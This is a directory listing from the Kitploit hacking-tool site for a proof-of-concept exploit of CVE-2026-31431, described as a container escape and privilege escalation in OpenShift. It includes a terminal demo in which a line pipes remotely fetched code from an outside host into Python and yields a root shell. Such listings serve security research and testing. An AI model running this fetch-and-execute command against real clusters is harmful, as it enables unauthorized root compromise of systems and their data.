Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
TEST-CVE-2026-31431 — Proof-of-concept exploit for CVE-2026-31431 demonstrating container escape and privilege escalation in OpenShift environments. | Kitploit
Tools/GitHubGitHub/gmeghnag/test-cve-2026-31431
Privilege EscalationVulnerability AnalysisExploitationRed TeamingContainer Escape
GitHubgmeghnag/test-cve-2026-31431

TEST-CVE-2026-31431

Proof-of-concept exploit for CVE-2026-31431 demonstrating container escape and privilege escalation in OpenShift environments.

View Repository
154 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

TEST-CVE-2026-31431

root@kitploit:~
# oc new-app -n default https://github.com/gmeghnag/TEST-CVE-2026-31431
# oc rsh -n default deployment/test-cve-2026-31431
sh-5.1$ id
uid=1001(1001) gid=0(root) groups=0(root)
sh-5.1$ curl -s https://copy.fail/exp | python3.12 && su
[root@test-cve-2026-31431-78f6d9cc97-n7d5j /]# id
uid=0(root) gid=0(root) groups=0(root)
Download Tool